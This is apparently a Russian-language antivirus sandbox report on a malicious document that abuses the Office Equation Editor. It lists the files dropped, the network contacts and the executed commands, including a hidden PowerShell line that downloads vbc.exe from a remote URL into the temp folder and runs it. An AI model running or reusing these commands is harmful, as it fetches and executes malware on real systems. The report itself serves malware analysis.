Техническая информация
- '' (загружен из сети Интернет)
- 'C:\users\public\vbc.exe'
- https://ggle.io/4fj4 as %temp%\\vbc.exe
- C:\users\public\vbc.exe
- '13.##8.159.178':80
- 'gg#e.io':443
- http://13.##8.159.178/hkcmd/kernel.exe
- 'gg#e.io':443
- DNS ASK gg#e.io
- '<SYSTEM32>\cmd.exe' /c powershell (New-Object System.Net.WebClient).DownloadFile('https://ggle.io/4Fj4', '%Temp%\\vbc.exe') & powershell Start-Process -FilePath '%Temp%\\vbc.exe' & exit' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '<SYSTEM32>\cmd.exe' /c powershell (New-Object System.Net.WebClient).DownloadFile('https://ggle.io/4Fj4', '%Temp%\\vbc.exe') & powershell Start-Process -FilePath '%Temp%\\vbc.exe' & exit
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Start-Process -FilePath '%TEMP%\\vbc.exe'